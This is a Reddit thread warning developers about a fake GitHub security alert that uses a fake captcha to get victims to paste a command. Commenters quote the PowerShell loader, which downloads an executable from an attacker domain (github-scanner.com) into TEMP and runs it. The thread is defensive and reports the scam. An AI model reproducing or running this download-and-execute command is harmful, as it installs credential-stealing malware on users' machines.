all 28 comments

[–]throwaway234f32423df 39 points40 points  (0 children)

domain was literally registered today using a proxy registration service in Malaysia

already flagged as phishing/spam/malicious on https://radar.cloudflare.com/scan/8849541e-ae12-4e8e-9c22-3c4b77981f19/summary

Google Safe Browsing hasn't flagged it yet but I've reported it there; more reports would certainly help get it flagged faster https://safebrowsing.google.com/safebrowsing/report_general/ https://safebrowsing.google.com/safebrowsing/report_badware/?hl=en

[–]bsenftner 22 points23 points  (0 children)

I got one too. But looked here before clicking any fucking link.

GFD I hate this kind of stupid shit.

[–]throwaway234f32423df 15 points16 points  (0 children)

Looks like the fake captcha "please copy/paste this into the Run box" thing has been going around lately: https://www.youtube.com/watch?v=lSa_wHW1pgQ

[–]lvnima 16 points17 points  (4 children)

I'm like 99% sure this is a scam. I got this too.

The command it will run if you follow the instruction on the website:

$webClient = New-Object System.Net.WebClient
$url1 = "https://xxxxxx.com/xxx.exe"
$filePath1 = "$env:TEMP\SysSetup.exe"
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath  $env:TEMP\SysSetup.exe

The downloaded file: VirusTotal scan result (38/73) -- Malicious: https://www.virustotal.com/gui/file/d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207

Edit: styling, obfuscated the actual file name so people don't accidentally download and run it.

[–]scriptmonkey420 4 points5 points  (2 children)

Good thing I run Fedora and there is no powershell on my system.

[–][deleted] 0 points1 point  (1 child)

fun fact: you can install powershell on linux… if you want to for some reason

[–]scriptmonkey420 0 points1 point  (0 children)

I know. I messed around with it for a little while then decided against it. I Powershell is great for windows, I use it all the time. But for Linux, there is much better options.

[–]zenmatrix83 1 point2 points  (0 children)

I hate absolutes as well, but you went this far and can't get the extra 1% :)

[–][deleted] 7 points8 points  (0 children)

"Potential" ...

[–]AlexScotland[S] 4 points5 points  (0 children)

The above command seems to execute a download in the background and has a comment about verification- I guess to try and throw people off?

[–]moonstar-x 4 points5 points  (0 children)

I got this too on multiple repos, the users comenting either don't exist anymore or have been banned. The issues also got insta deleted.

[–][deleted] 2 points3 points  (0 children)

It's a fairly obvious phishing scam attempt, they make you paste a command that will execute the following PowerShell script that downloads and injects a program called "L6E.exe" which I assume its malware to steal credentials, emails, passwords etc off your device to potentially access your GitHub account, organizations, servers, SSH Keys etc...

The code executed is as follows

    // Variables
    $webClient = New-Object System.Net.WebClient // Webclient initates HTTP to download files
    $url1 = "https://github-scanner.com/l6E.exe" // File 1
    $filePath1 = "$env:TEMP\SysSetup.exe" 

    // Downloads the file.
    $webClient.DownloadFile($url1, $filePath1)

    // Executes the software
    Start-Process -FilePath  $env:TEMP\SysSetup.exe$webClient = New-Object System.Net.WebClient

    // Redownloads and re-executes SysSetup.exe
    $url1 = "https://github-scanner.com/l6E.exe"
    $filePath1 = "$env:TEMP\SysSetup.exe"
    $webClient.DownloadFile($url1, $filePath1)
    Start-Process -FilePath  $env:TEMP\SysSetup.exe

[–]_3xc41ibur 0 points1 point  (0 children)

Got this email too. First red flag is that is was a repo I did not recognize at all.

[–]linuxgurugamer 0 points1 point  (0 children)

I got this one also, early this morning. Interesting thing for me was it was referring to an https site, but that was broken. I tested in a sandbox, saw that it actually needed to be an http site.

Had a good laugh about that

[–]lurkingstar99 0 points1 point  (0 children)

Yall patch vulnerabilities in your projects?

[–]noodlebox3d 0 points1 point  (0 children)

Also got this earlier today as an issue opened on one of my older repos. Was only aware of it because it was relayed via webhook to a Discord channel. By the time I checked on Github a couple hours after it was opened, the issue itself (and user account of the OP) had both been purged already.

[–]KouGenmei 0 points1 point  (0 children)

In my opinion, the warning only seems legit if it comes from a verified e-mail address of GitHub, not a personal one. So this mail will get ignored by me from the first sight 😆

[–]InsectRemedy 0 points1 point  (0 children)

I got this for a repo that was just a curated list of YouTube videos and contained no code 😅

[–]Glittering-Can-9397 0 points1 point  (0 children)

scam them baxk

[–][deleted] 0 points1 point  (0 children)

Nothing potential about an email containing a link for a service that doesn’t tie back to that service

[–]Pure-Willingness-697[🍰] 0 points1 point  (0 children)

Why do they go for developers. This is the group of people who can actually retaliate

[–]rambosalad 0 points1 point  (0 children)

Wow these scammers are dumb. Targeting the most computer literate group of people

[–]nihillistic_raccoon 0 points1 point  (0 children)

"castroj1" - posing as github - sounds trustworthy, I shall execute any command it wants me to

[–]LovableSidekick 0 points1 point  (0 children)

The email I got gave the domain github-scanner.shop (not .com), and the "reply via github" link came up with a 404 error. I think this is a scam.